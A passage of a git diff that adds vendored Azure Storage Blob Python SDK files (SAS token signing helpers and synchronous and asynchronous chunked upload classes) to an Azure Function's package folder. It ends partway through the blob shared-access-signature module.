+ ''' + sas = _SharedAccessHelper() + sas.add_base(permission, expiry, start, ip, protocol, self.x_ms_version) + sas.add_account(services, resource_types) + sas.add_encryption_scope(**kwargs) + sas.add_account_signature(self.account_name, self.account_key) + + return sas.get_token() + + +class _SharedAccessHelper(object): + def __init__(self): + self.query_dict = {} + + def _add_query(self, name, val): + if val: + self.query_dict[name] = _str(val) if val is not None else None + + def add_encryption_scope(self, **kwargs): + self._add_query(QueryStringConstants.SIGNED_ENCRYPTION_SCOPE, kwargs.pop('encryption_scope', None)) + + def add_base(self, permission, expiry, start, ip, protocol, x_ms_version): + if isinstance(start, date): + start = _to_utc_datetime(start) + + if isinstance(expiry, date): + expiry = _to_utc_datetime(expiry) + + self._add_query(QueryStringConstants.SIGNED_START, start) + self._add_query(QueryStringConstants.SIGNED_EXPIRY, expiry) + self._add_query(QueryStringConstants.SIGNED_PERMISSION, permission) + self._add_query(QueryStringConstants.SIGNED_IP, ip) + self._add_query(QueryStringConstants.SIGNED_PROTOCOL, protocol) + self._add_query(QueryStringConstants.SIGNED_VERSION, x_ms_version) + + def add_resource(self, resource): + self._add_query(QueryStringConstants.SIGNED_RESOURCE, resource) + + def add_id(self, policy_id): + self._add_query(QueryStringConstants.SIGNED_IDENTIFIER, policy_id) + + def add_account(self, services, resource_types): + self._add_query(QueryStringConstants.SIGNED_SERVICES, services) + self._add_query(QueryStringConstants.SIGNED_RESOURCE_TYPES, resource_types) + + def add_override_response_headers(self, cache_control, + content_disposition, + content_encoding, + content_language, + content_type): + self._add_query(QueryStringConstants.SIGNED_CACHE_CONTROL, cache_control) + self._add_query(QueryStringConstants.SIGNED_CONTENT_DISPOSITION, content_disposition) + self._add_query(QueryStringConstants.SIGNED_CONTENT_ENCODING, content_encoding) + self._add_query(QueryStringConstants.SIGNED_CONTENT_LANGUAGE, content_language) + self._add_query(QueryStringConstants.SIGNED_CONTENT_TYPE, content_type) + + def add_account_signature(self, account_name, account_key): + def get_value_to_append(query): + return_value = self.query_dict.get(query) or '' + return return_value + '\n' + + string_to_sign = \ + (account_name + '\n' + + get_value_to_append(QueryStringConstants.SIGNED_PERMISSION) + + get_value_to_append(QueryStringConstants.SIGNED_SERVICES) + + get_value_to_append(QueryStringConstants.SIGNED_RESOURCE_TYPES) + + get_value_to_append(QueryStringConstants.SIGNED_START) + + get_value_to_append(QueryStringConstants.SIGNED_EXPIRY) + + get_value_to_append(QueryStringConstants.SIGNED_IP) + + get_value_to_append(QueryStringConstants.SIGNED_PROTOCOL) + + get_value_to_append(QueryStringConstants.SIGNED_VERSION) + + get_value_to_append(QueryStringConstants.SIGNED_ENCRYPTION_SCOPE)) + + self._add_query(QueryStringConstants.SIGNED_SIGNATURE, + sign_string(account_key, string_to_sign)) + + def get_token(self): + return '&'.join(['{0}={1}'.format(n, url_quote(v)) for n, v in self.query_dict.items() if v is not None]) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/uploads.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/uploads.py new file mode 100644 index 0000000..fa5c791 --- /dev/null +++ 
b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/uploads.py @@ -0,0 +1,620 @@ +# ------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for +# license information. +# -------------------------------------------------------------------------- +# pylint: disable=no-self-use + +from concurrent import futures +from io import (BytesIO, IOBase, SEEK_CUR, SEEK_END, SEEK_SET, UnsupportedOperation) +from threading import Lock +from itertools import islice +from math import ceil + +import six + +from azure.core.tracing.common import with_current_context + +from . import encode_base64, url_quote +from .request_handlers import get_length +from .response_handlers import return_response_headers +from .encryption import get_blob_encryptor_and_padder + + +_LARGE_BLOB_UPLOAD_MAX_READ_BUFFER_SIZE = 4 * 1024 * 1024 +_ERROR_VALUE_SHOULD_BE_SEEKABLE_STREAM = "{0} should be a seekable file-like/io.IOBase type stream object." + + +def _parallel_uploads(executor, uploader, pending, running): + range_ids = [] + while True: + # Wait for some upload to finish before adding a new one + done, running = futures.wait(running, return_when=futures.FIRST_COMPLETED) + range_ids.extend([chunk.result() for chunk in done]) + try: + for _ in range(0, len(done)): + next_chunk = next(pending) + running.add(executor.submit(with_current_context(uploader), next_chunk)) + except StopIteration: + break + + # Wait for the remaining uploads to finish + done, _running = futures.wait(running) + range_ids.extend([chunk.result() for chunk in done]) + return range_ids + + +def upload_data_chunks( + service=None, + uploader_class=None, + total_size=None, + chunk_size=None, + max_concurrency=None, + stream=None, + validate_content=None, + encryption_options=None, + progress_hook=None, + **kwargs): + + if encryption_options: + encryptor, padder = get_blob_encryptor_and_padder( + encryption_options.get('cek'), + encryption_options.get('vector'), + uploader_class is not PageBlobChunkUploader) + kwargs['encryptor'] = encryptor + kwargs['padder'] = padder + + parallel = max_concurrency > 1 + if parallel and 'modified_access_conditions' in kwargs: + # Access conditions do not work with parallelism + kwargs['modified_access_conditions'] = None + + uploader = uploader_class( + service=service, + total_size=total_size, + chunk_size=chunk_size, + stream=stream, + parallel=parallel, + validate_content=validate_content, + progress_hook=progress_hook, + **kwargs) + if parallel: + with futures.ThreadPoolExecutor(max_concurrency) as executor: + upload_tasks = uploader.get_chunk_streams() + running_futures = [ + executor.submit(with_current_context(uploader.process_chunk), u) + for u in islice(upload_tasks, 0, max_concurrency) + ] + range_ids = _parallel_uploads(executor, uploader.process_chunk, upload_tasks, running_futures) + else: + range_ids = [uploader.process_chunk(result) for result in uploader.get_chunk_streams()] + if any(range_ids): + return [r[1] for r in sorted(range_ids, key=lambda r: r[0])] + return uploader.response_headers + + +def upload_substream_blocks( + service=None, + uploader_class=None, + total_size=None, + chunk_size=None, + max_concurrency=None, + stream=None, + progress_hook=None, + **kwargs): + parallel = max_concurrency > 1 + if parallel and 'modified_access_conditions' in kwargs: + # Access conditions do not work with
parallelism + kwargs['modified_access_conditions'] = None + uploader = uploader_class( + service=service, + total_size=total_size, + chunk_size=chunk_size, + stream=stream, + parallel=parallel, + progress_hook=progress_hook, + **kwargs) + + if parallel: + with futures.ThreadPoolExecutor(max_concurrency) as executor: + upload_tasks = uploader.get_substream_blocks() + running_futures = [ + executor.submit(with_current_context(uploader.process_substream_block), u) + for u in islice(upload_tasks, 0, max_concurrency) + ] + range_ids = _parallel_uploads(executor, uploader.process_substream_block, upload_tasks, running_futures) + else: + range_ids = [uploader.process_substream_block(b) for b in uploader.get_substream_blocks()] + if any(range_ids): + return sorted(range_ids) + return [] + + +class _ChunkUploader(object): # pylint: disable=too-many-instance-attributes + + def __init__( + self, service, + total_size, + chunk_size, + stream, + parallel, + encryptor=None, + padder=None, + progress_hook=None, + **kwargs): + self.service = service + self.total_size = total_size + self.chunk_size = chunk_size + self.stream = stream + self.parallel = parallel + + # Stream management + self.stream_start = stream.tell() if parallel else None + self.stream_lock = Lock() if parallel else None + + # Progress feedback + self.progress_total = 0 + self.progress_lock = Lock() if parallel else None + self.progress_hook = progress_hook + + # Encryption + self.encryptor = encryptor + self.padder = padder + self.response_headers = None + self.etag = None + self.last_modified = None + self.request_options = kwargs + + def get_chunk_streams(self): + index = 0 + while True: + data = b"" + read_size = self.chunk_size + + # Buffer until we either reach the end of the stream or get a whole chunk. + while True: + if self.total_size: + read_size = min(self.chunk_size - len(data), self.total_size - (index + len(data))) + temp = self.stream.read(read_size) + if not isinstance(temp, six.binary_type): + raise TypeError("Blob data should be of type bytes.") + data += temp or b"" + + # We have read an empty string and so are at the end + # of the buffer or we have read a full chunk. 
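+                # Each full chunk leaves this loop and is yielded as an
+                # (offset, bytes) pair, so parallel uploads can later be
+                # re-sorted by offset.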
+ if temp == b"" or len(data) == self.chunk_size: + break + + if len(data) == self.chunk_size: + if self.padder: + data = self.padder.update(data) + if self.encryptor: + data = self.encryptor.update(data) + yield index, data + else: + if self.padder: + data = self.padder.update(data) + self.padder.finalize() + if self.encryptor: + data = self.encryptor.update(data) + self.encryptor.finalize() + if data: + yield index, data + break + index += len(data) + + def process_chunk(self, chunk_data): + chunk_bytes = chunk_data[1] + chunk_offset = chunk_data[0] + return self._upload_chunk_with_progress(chunk_offset, chunk_bytes) + + def _update_progress(self, length): + if self.progress_lock is not None: + with self.progress_lock: + self.progress_total += length + else: + self.progress_total += length + + if self.progress_hook: + self.progress_hook(self.progress_total, self.total_size) + + def _upload_chunk(self, chunk_offset, chunk_data): + raise NotImplementedError("Must be implemented by child class.") + + def _upload_chunk_with_progress(self, chunk_offset, chunk_data): + range_id = self._upload_chunk(chunk_offset, chunk_data) + self._update_progress(len(chunk_data)) + return range_id + + def get_substream_blocks(self): + assert self.chunk_size is not None + lock = self.stream_lock + blob_length = self.total_size + + if blob_length is None: + blob_length = get_length(self.stream) + if blob_length is None: + raise ValueError("Unable to determine content length of upload data.") + + blocks = int(ceil(blob_length / (self.chunk_size * 1.0))) + last_block_size = self.chunk_size if blob_length % self.chunk_size == 0 else blob_length % self.chunk_size + + for i in range(blocks): + index = i * self.chunk_size + length = last_block_size if i == blocks - 1 else self.chunk_size + yield index, SubStream(self.stream, index, length, lock) + + def process_substream_block(self, block_data): + return self._upload_substream_block_with_progress(block_data[0], block_data[1]) + + def _upload_substream_block(self, index, block_stream): + raise NotImplementedError("Must be implemented by child class.") + + def _upload_substream_block_with_progress(self, index, block_stream): + range_id = self._upload_substream_block(index, block_stream) + self._update_progress(len(block_stream)) + return range_id + + def set_response_properties(self, resp): + self.etag = resp.etag + self.last_modified = resp.last_modified + + +class BlockBlobChunkUploader(_ChunkUploader): + + def __init__(self, *args, **kwargs): + kwargs.pop("modified_access_conditions", None) + super(BlockBlobChunkUploader, self).__init__(*args, **kwargs) + self.current_length = None + + def _upload_chunk(self, chunk_offset, chunk_data): + # TODO: This is incorrect, but works with recording. 
+ index = '{0:032d}'.format(chunk_offset) + block_id = encode_base64(url_quote(encode_base64(index))) + self.service.stage_block( + block_id, + len(chunk_data), + chunk_data, + data_stream_total=self.total_size, + upload_stream_current=self.progress_total, + **self.request_options + ) + return index, block_id + + def _upload_substream_block(self, index, block_stream): + try: + block_id = 'BlockId{}'.format("%05d" % (index/self.chunk_size)) + self.service.stage_block( + block_id, + len(block_stream), + block_stream, + data_stream_total=self.total_size, + upload_stream_current=self.progress_total, + **self.request_options + ) + finally: + block_stream.close() + return block_id + + +class PageBlobChunkUploader(_ChunkUploader): # pylint: disable=abstract-method + + def _is_chunk_empty(self, chunk_data): + # read until non-zero byte is encountered + # if reached the end without returning, then chunk_data is all 0's + return not any(bytearray(chunk_data)) + + def _upload_chunk(self, chunk_offset, chunk_data): + # avoid uploading the empty pages + if not self._is_chunk_empty(chunk_data): + chunk_end = chunk_offset + len(chunk_data) - 1 + content_range = "bytes={0}-{1}".format(chunk_offset, chunk_end) + computed_md5 = None + self.response_headers = self.service.upload_pages( + body=chunk_data, + content_length=len(chunk_data), + transactional_content_md5=computed_md5, + range=content_range, + cls=return_response_headers, + data_stream_total=self.total_size, + upload_stream_current=self.progress_total, + **self.request_options + ) + + if not self.parallel and self.request_options.get('modified_access_conditions'): + self.request_options['modified_access_conditions'].if_match = self.response_headers['etag'] + + def _upload_substream_block(self, index, block_stream): + pass + + +class AppendBlobChunkUploader(_ChunkUploader): # pylint: disable=abstract-method + + def __init__(self, *args, **kwargs): + super(AppendBlobChunkUploader, self).__init__(*args, **kwargs) + self.current_length = None + + def _upload_chunk(self, chunk_offset, chunk_data): + if self.current_length is None: + self.response_headers = self.service.append_block( + body=chunk_data, + content_length=len(chunk_data), + cls=return_response_headers, + data_stream_total=self.total_size, + upload_stream_current=self.progress_total, + **self.request_options + ) + self.current_length = int(self.response_headers["blob_append_offset"]) + else: + self.request_options['append_position_access_conditions'].append_position = \ + self.current_length + chunk_offset + self.response_headers = self.service.append_block( + body=chunk_data, + content_length=len(chunk_data), + cls=return_response_headers, + data_stream_total=self.total_size, + upload_stream_current=self.progress_total, + **self.request_options + ) + + def _upload_substream_block(self, index, block_stream): + pass + + +class DataLakeFileChunkUploader(_ChunkUploader): # pylint: disable=abstract-method + + def _upload_chunk(self, chunk_offset, chunk_data): + # avoid uploading the empty pages + self.response_headers = self.service.append_data( + body=chunk_data, + position=chunk_offset, + content_length=len(chunk_data), + cls=return_response_headers, + data_stream_total=self.total_size, + upload_stream_current=self.progress_total, + **self.request_options + ) + + if not self.parallel and self.request_options.get('modified_access_conditions'): + self.request_options['modified_access_conditions'].if_match = self.response_headers['etag'] + + def _upload_substream_block(self, index, block_stream): 
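+        # Append one SubStream window at its absolute file position; the
+        # window is closed even if the service call raises.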
+ try: + self.service.append_data( + body=block_stream, + position=index, + content_length=len(block_stream), + cls=return_response_headers, + data_stream_total=self.total_size, + upload_stream_current=self.progress_total, + **self.request_options + ) + finally: + block_stream.close() + + +class FileChunkUploader(_ChunkUploader): # pylint: disable=abstract-method + + def _upload_chunk(self, chunk_offset, chunk_data): + length = len(chunk_data) + chunk_end = chunk_offset + length - 1 + response = self.service.upload_range( + chunk_data, + chunk_offset, + length, + data_stream_total=self.total_size, + upload_stream_current=self.progress_total, + **self.request_options + ) + return 'bytes={0}-{1}'.format(chunk_offset, chunk_end), response + + # TODO: Implement this method. + def _upload_substream_block(self, index, block_stream): + pass + + +class SubStream(IOBase): + + def __init__(self, wrapped_stream, stream_begin_index, length, lockObj): + # Python 2.7: file-like objects created with open() typically support seek(), but are not + # derivations of io.IOBase and thus do not implement seekable(). + # Python > 3.0: file-like objects created with open() are derived from io.IOBase. + try: + # only the main thread runs this, so there's no need grabbing the lock + wrapped_stream.seek(0, SEEK_CUR) + except: + raise ValueError("Wrapped stream must support seek().") + + self._lock = lockObj + self._wrapped_stream = wrapped_stream + self._position = 0 + self._stream_begin_index = stream_begin_index + self._length = length + self._buffer = BytesIO() + + # we must avoid buffering more than necessary, and also not use up too much memory + # so the max buffer size is capped at 4MB + self._max_buffer_size = ( + length if length < _LARGE_BLOB_UPLOAD_MAX_READ_BUFFER_SIZE else _LARGE_BLOB_UPLOAD_MAX_READ_BUFFER_SIZE + ) + self._current_buffer_start = 0 + self._current_buffer_size = 0 + super(SubStream, self).__init__() + + def __len__(self): + return self._length + + def close(self): + if self._buffer: + self._buffer.close() + self._wrapped_stream = None + IOBase.close(self) + + def fileno(self): + return self._wrapped_stream.fileno() + + def flush(self): + pass + + def read(self, size=None): + if self.closed: # pylint: disable=using-constant-test + raise ValueError("Stream is closed.") + + if size is None: + size = self._length - self._position + + # adjust if out of bounds + if size + self._position >= self._length: + size = self._length - self._position + + # return fast + if size == 0 or self._buffer.closed: + return b"" + + # attempt first read from the read buffer and update position + read_buffer = self._buffer.read(size) + bytes_read = len(read_buffer) + bytes_remaining = size - bytes_read + self._position += bytes_read + + # repopulate the read buffer from the underlying stream to fulfill the request + # ensure the seek and read operations are done atomically (only if a lock is provided) + if bytes_remaining > 0: + with self._buffer: + # either read in the max buffer size specified on the class + # or read in just enough data for the current block/sub stream + current_max_buffer_size = min(self._max_buffer_size, self._length - self._position) + + # lock is only defined if max_concurrency > 1 (parallel uploads) + if self._lock: + with self._lock: + # reposition the underlying stream to match the start of the data to read + absolute_position = self._stream_begin_index + self._position + self._wrapped_stream.seek(absolute_position, SEEK_SET) + # If we can't seek to the right location, our read will be 
corrupted so fail fast. + if self._wrapped_stream.tell() != absolute_position: + raise IOError("Stream failed to seek to the desired location.") + buffer_from_stream = self._wrapped_stream.read(current_max_buffer_size) + else: + absolute_position = self._stream_begin_index + self._position + # It's possible that there's connection problem during data transfer, + # so when we retry we don't want to read from current position of wrapped stream, + # instead we should seek to where we want to read from. + if self._wrapped_stream.tell() != absolute_position: + self._wrapped_stream.seek(absolute_position, SEEK_SET) + + buffer_from_stream = self._wrapped_stream.read(current_max_buffer_size) + + if buffer_from_stream: + # update the buffer with new data from the wrapped stream + # we need to note down the start position and size of the buffer, in case seek is performed later + self._buffer = BytesIO(buffer_from_stream) + self._current_buffer_start = self._position + self._current_buffer_size = len(buffer_from_stream) + + # read the remaining bytes from the new buffer and update position + second_read_buffer = self._buffer.read(bytes_remaining) + read_buffer += second_read_buffer + self._position += len(second_read_buffer) + + return read_buffer + + def readable(self): + return True + + def readinto(self, b): + raise UnsupportedOperation + + def seek(self, offset, whence=0): + if whence is SEEK_SET: + start_index = 0 + elif whence is SEEK_CUR: + start_index = self._position + elif whence is SEEK_END: + start_index = self._length + offset = -offset + else: + raise ValueError("Invalid argument for the 'whence' parameter.") + + pos = start_index + offset + + if pos > self._length: + pos = self._length + elif pos < 0: + pos = 0 + + # check if buffer is still valid + # if not, drop buffer + if pos < self._current_buffer_start or pos >= self._current_buffer_start + self._current_buffer_size: + self._buffer.close() + self._buffer = BytesIO() + else: # if yes seek to correct position + delta = pos - self._current_buffer_start + self._buffer.seek(delta, SEEK_SET) + + self._position = pos + return pos + + def seekable(self): + return True + + def tell(self): + return self._position + + def write(self): + raise UnsupportedOperation + + def writelines(self): + raise UnsupportedOperation + + def writeable(self): + return False + + +class IterStreamer(object): + """ + File-like streaming iterator. + """ + + def __init__(self, generator, encoding="UTF-8"): + self.generator = generator + self.iterator = iter(generator) + self.leftover = b"" + self.encoding = encoding + + def __len__(self): + return self.generator.__len__() + + def __iter__(self): + return self.iterator + + def seekable(self): + return False + + def __next__(self): + return next(self.iterator) + + next = __next__ # Python 2 compatibility. + + def tell(self, *args, **kwargs): + raise UnsupportedOperation("Data generator does not support tell.") + + def seek(self, *args, **kwargs): + raise UnsupportedOperation("Data generator is unseekable.") + + def read(self, size): + data = self.leftover + count = len(self.leftover) + try: + while count < size: + chunk = self.__next__() + if isinstance(chunk, six.text_type): + chunk = chunk.encode(self.encoding) + data += chunk + count += len(chunk) + # This means count < size and what's leftover will be returned in this call. 
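+        # The generator is exhausted, so whatever was gathered (possibly
+        # fewer than `size` bytes) is returned below.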
+ except StopIteration: + self.leftover = b"" + + if count >= size: + self.leftover = data[size:] + + return data[:size] diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/uploads_async.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/uploads_async.py new file mode 100644 index 0000000..4892758 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/uploads_async.py @@ -0,0 +1,412 @@ +# ------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for +# license information. +# -------------------------------------------------------------------------- +# pylint: disable=no-self-use + +import asyncio +from asyncio import Lock +from itertools import islice +import threading + +from math import ceil + +import six + +from . import encode_base64, url_quote +from .request_handlers import get_length +from .response_handlers import return_response_headers +from .encryption import get_blob_encryptor_and_padder +from .uploads import SubStream, IterStreamer # pylint: disable=unused-import + + +_LARGE_BLOB_UPLOAD_MAX_READ_BUFFER_SIZE = 4 * 1024 * 1024 +_ERROR_VALUE_SHOULD_BE_SEEKABLE_STREAM = '{0} should be a seekable file-like/io.IOBase type stream object.' + + +async def _parallel_uploads(uploader, pending, running): + range_ids = [] + while True: + # Wait for some upload to finish before adding a new one + done, running = await asyncio.wait(running, return_when=asyncio.FIRST_COMPLETED) + range_ids.extend([chunk.result() for chunk in done]) + try: + for _ in range(0, len(done)): + next_chunk = next(pending) + running.add(asyncio.ensure_future(uploader(next_chunk))) + except StopIteration: + break + + # Wait for the remaining uploads to finish + if running: + done, _running = await asyncio.wait(running) + range_ids.extend([chunk.result() for chunk in done]) + return range_ids + + +async def upload_data_chunks( + service=None, + uploader_class=None, + total_size=None, + chunk_size=None, + max_concurrency=None, + stream=None, + encryption_options=None, + progress_hook=None, + **kwargs): + + if encryption_options: + encryptor, padder = get_blob_encryptor_and_padder( + encryption_options.get('cek'), + encryption_options.get('vector'), + uploader_class is not PageBlobChunkUploader) + kwargs['encryptor'] = encryptor + kwargs['padder'] = padder + + parallel = max_concurrency > 1 + if parallel and 'modified_access_conditions' in kwargs: + # Access conditions do not work with parallelism + kwargs['modified_access_conditions'] = None + + uploader = uploader_class( + service=service, + total_size=total_size, + chunk_size=chunk_size, + stream=stream, + parallel=parallel, + progress_hook=progress_hook, + **kwargs) + + if parallel: + upload_tasks = uploader.get_chunk_streams() + running_futures = [ + asyncio.ensure_future(uploader.process_chunk(u)) + for u in islice(upload_tasks, 0, max_concurrency) + ] + range_ids = await _parallel_uploads(uploader.process_chunk, upload_tasks, running_futures) + else: + range_ids = [] + for chunk in uploader.get_chunk_streams(): + range_ids.append(await uploader.process_chunk(chunk)) + + if any(range_ids): + return [r[1] for r in sorted(range_ids, key=lambda r: r[0])] + return uploader.response_headers + + +async def
upload_substream_blocks( + service=None, + uploader_class=None, + total_size=None, + chunk_size=None, + max_concurrency=None, + stream=None, + progress_hook=None, + **kwargs): + parallel = max_concurrency > 1 + if parallel and 'modified_access_conditions' in kwargs: + # Access conditions do not work with parallelism + kwargs['modified_access_conditions'] = None + uploader = uploader_class( + service=service, + total_size=total_size, + chunk_size=chunk_size, + stream=stream, + parallel=parallel, + progress_hook=progress_hook, + **kwargs) + + if parallel: + upload_tasks = uploader.get_substream_blocks() + running_futures = [ + asyncio.ensure_future(uploader.process_substream_block(u)) + for u in islice(upload_tasks, 0, max_concurrency) + ] + range_ids = await _parallel_uploads(uploader.process_substream_block, upload_tasks, running_futures) + else: + range_ids = [] + for block in uploader.get_substream_blocks(): + range_ids.append(await uploader.process_substream_block(block)) + if any(range_ids): + return sorted(range_ids) + return + + +class _ChunkUploader(object): # pylint: disable=too-many-instance-attributes + + def __init__( + self, service, + total_size, + chunk_size, + stream, + parallel, + encryptor=None, + padder=None, + progress_hook=None, + **kwargs): + self.service = service + self.total_size = total_size + self.chunk_size = chunk_size + self.stream = stream + self.parallel = parallel + + # Stream management + self.stream_start = stream.tell() if parallel else None + self.stream_lock = threading.Lock() if parallel else None + + # Progress feedback + self.progress_total = 0 + self.progress_lock = Lock() if parallel else None + self.progress_hook = progress_hook + + # Encryption + self.encryptor = encryptor + self.padder = padder + self.response_headers = None + self.etag = None + self.last_modified = None + self.request_options = kwargs + + def get_chunk_streams(self): + index = 0 + while True: + data = b'' + read_size = self.chunk_size + + # Buffer until we either reach the end of the stream or get a whole chunk. + while True: + if self.total_size: + read_size = min(self.chunk_size - len(data), self.total_size - (index + len(data))) + temp = self.stream.read(read_size) + if not isinstance(temp, six.binary_type): + raise TypeError('Blob data should be of type bytes.') + data += temp or b"" + + # We have read an empty string and so are at the end + # of the buffer or we have read a full chunk. 
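+                # As in the synchronous uploader, chunks leave this loop as
+                # (offset, data) pairs for later re-ordering by offset.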
+ if temp == b'' or len(data) == self.chunk_size: + break + + if len(data) == self.chunk_size: + if self.padder: + data = self.padder.update(data) + if self.encryptor: + data = self.encryptor.update(data) + yield index, data + else: + if self.padder: + data = self.padder.update(data) + self.padder.finalize() + if self.encryptor: + data = self.encryptor.update(data) + self.encryptor.finalize() + if data: + yield index, data + break + index += len(data) + + async def process_chunk(self, chunk_data): + chunk_bytes = chunk_data[1] + chunk_offset = chunk_data[0] + return await self._upload_chunk_with_progress(chunk_offset, chunk_bytes) + + async def _update_progress(self, length): + if self.progress_lock is not None: + async with self.progress_lock: + self.progress_total += length + else: + self.progress_total += length + + if self.progress_hook: + await self.progress_hook(self.progress_total, self.total_size) + + async def _upload_chunk(self, chunk_offset, chunk_data): + raise NotImplementedError("Must be implemented by child class.") + + async def _upload_chunk_with_progress(self, chunk_offset, chunk_data): + range_id = await self._upload_chunk(chunk_offset, chunk_data) + await self._update_progress(len(chunk_data)) + return range_id + + def get_substream_blocks(self): + assert self.chunk_size is not None + lock = self.stream_lock + blob_length = self.total_size + + if blob_length is None: + blob_length = get_length(self.stream) + if blob_length is None: + raise ValueError("Unable to determine content length of upload data.") + + blocks = int(ceil(blob_length / (self.chunk_size * 1.0))) + last_block_size = self.chunk_size if blob_length % self.chunk_size == 0 else blob_length % self.chunk_size + + for i in range(blocks): + index = i * self.chunk_size + length = last_block_size if i == blocks - 1 else self.chunk_size + yield index, SubStream(self.stream, index, length, lock) + + async def process_substream_block(self, block_data): + return await self._upload_substream_block_with_progress(block_data[0], block_data[1]) + + async def _upload_substream_block(self, index, block_stream): + raise NotImplementedError("Must be implemented by child class.") + + async def _upload_substream_block_with_progress(self, index, block_stream): + range_id = await self._upload_substream_block(index, block_stream) + await self._update_progress(len(block_stream)) + return range_id + + def set_response_properties(self, resp): + self.etag = resp.etag + self.last_modified = resp.last_modified + + +class BlockBlobChunkUploader(_ChunkUploader): + + def __init__(self, *args, **kwargs): + kwargs.pop('modified_access_conditions', None) + super(BlockBlobChunkUploader, self).__init__(*args, **kwargs) + self.current_length = None + + async def _upload_chunk(self, chunk_offset, chunk_data): + # TODO: This is incorrect, but works with recording. 
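+        # Same fixed-length, double base64-encoded block-id scheme as the
+        # synchronous uploader.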
+ index = '{0:032d}'.format(chunk_offset) + block_id = encode_base64(url_quote(encode_base64(index))) + await self.service.stage_block( + block_id, + len(chunk_data), + body=chunk_data, + data_stream_total=self.total_size, + upload_stream_current=self.progress_total, + **self.request_options) + return index, block_id + + async def _upload_substream_block(self, index, block_stream): + try: + block_id = 'BlockId{}'.format("%05d" % (index/self.chunk_size)) + await self.service.stage_block( + block_id, + len(block_stream), + block_stream, + data_stream_total=self.total_size, + upload_stream_current=self.progress_total, + **self.request_options) + finally: + block_stream.close() + return block_id + + +class PageBlobChunkUploader(_ChunkUploader): # pylint: disable=abstract-method + + def _is_chunk_empty(self, chunk_data): + # read until non-zero byte is encountered + # if reached the end without returning, then chunk_data is all 0's + for each_byte in chunk_data: + if each_byte not in [0, b'\x00']: + return False + return True + + async def _upload_chunk(self, chunk_offset, chunk_data): + # avoid uploading the empty pages + if not self._is_chunk_empty(chunk_data): + chunk_end = chunk_offset + len(chunk_data) - 1 + content_range = 'bytes={0}-{1}'.format(chunk_offset, chunk_end) + computed_md5 = None + self.response_headers = await self.service.upload_pages( + body=chunk_data, + content_length=len(chunk_data), + transactional_content_md5=computed_md5, + range=content_range, + cls=return_response_headers, + data_stream_total=self.total_size, + upload_stream_current=self.progress_total, + **self.request_options) + + if not self.parallel and self.request_options.get('modified_access_conditions'): + self.request_options['modified_access_conditions'].if_match = self.response_headers['etag'] + + async def _upload_substream_block(self, index, block_stream): + pass + + +class AppendBlobChunkUploader(_ChunkUploader): # pylint: disable=abstract-method + + def __init__(self, *args, **kwargs): + super(AppendBlobChunkUploader, self).__init__(*args, **kwargs) + self.current_length = None + + async def _upload_chunk(self, chunk_offset, chunk_data): + if self.current_length is None: + self.response_headers = await self.service.append_block( + body=chunk_data, + content_length=len(chunk_data), + cls=return_response_headers, + data_stream_total=self.total_size, + upload_stream_current=self.progress_total, + **self.request_options) + self.current_length = int(self.response_headers['blob_append_offset']) + else: + self.request_options['append_position_access_conditions'].append_position = \ + self.current_length + chunk_offset + self.response_headers = await self.service.append_block( + body=chunk_data, + content_length=len(chunk_data), + cls=return_response_headers, + data_stream_total=self.total_size, + upload_stream_current=self.progress_total, + **self.request_options) + + async def _upload_substream_block(self, index, block_stream): + pass + + +class DataLakeFileChunkUploader(_ChunkUploader): # pylint: disable=abstract-method + + async def _upload_chunk(self, chunk_offset, chunk_data): + self.response_headers = await self.service.append_data( + body=chunk_data, + position=chunk_offset, + content_length=len(chunk_data), + cls=return_response_headers, + data_stream_total=self.total_size, + upload_stream_current=self.progress_total, + **self.request_options + ) + + if not self.parallel and self.request_options.get('modified_access_conditions'): + self.request_options['modified_access_conditions'].if_match = 
self.response_headers['etag'] + + async def _upload_substream_block(self, index, block_stream): + try: + await self.service.append_data( + body=block_stream, + position=index, + content_length=len(block_stream), + cls=return_response_headers, + data_stream_total=self.total_size, + upload_stream_current=self.progress_total, + **self.request_options + ) + finally: + block_stream.close() + + +class FileChunkUploader(_ChunkUploader):  # pylint: disable=abstract-method + + async def _upload_chunk(self, chunk_offset, chunk_data): + length = len(chunk_data) + chunk_end = chunk_offset + length - 1 + response = await self.service.upload_range( + chunk_data, + chunk_offset, + length, + data_stream_total=self.total_size, + upload_stream_current=self.progress_total, + **self.request_options + ) + range_id = 'bytes={0}-{1}'.format(chunk_offset, chunk_end) + return range_id, response + + # TODO: Implement this method. + async def _upload_substream_block(self, index, block_stream): + pass diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared_access_signature.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared_access_signature.py new file mode 100644 index 0000000..ae569ee --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared_access_signature.py @@ -0,0 +1,609 @@ +# ------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for +# license information. +# -------------------------------------------------------------------------- + +from typing import (  # pylint: disable=unused-import + Union, Optional, Any, TYPE_CHECKING +) + +from ._shared import sign_string, url_quote +from ._shared.constants import X_MS_VERSION +from ._shared.models import Services, UserDelegationKey +from ._shared.shared_access_signature import SharedAccessSignature, _SharedAccessHelper, \ + QueryStringConstants + +if TYPE_CHECKING: + from datetime import datetime + from ..blob import ( + ResourceTypes, + AccountSasPermissions, + ContainerSasPermissions, + BlobSasPermissions + ) + + +class BlobQueryStringConstants(object): + SIGNED_TIMESTAMP = 'snapshot' + + +class BlobSharedAccessSignature(SharedAccessSignature): + ''' + Provides a factory for creating blob and container access + signature tokens with a common account name and account key. Users can either + use the factory or can construct the appropriate service and use the + generate_*_shared_access_signature method directly. + ''' + + def __init__(self, account_name, account_key=None, user_delegation_key=None): + ''' + :param str account_name: + The storage account name used to generate the shared access 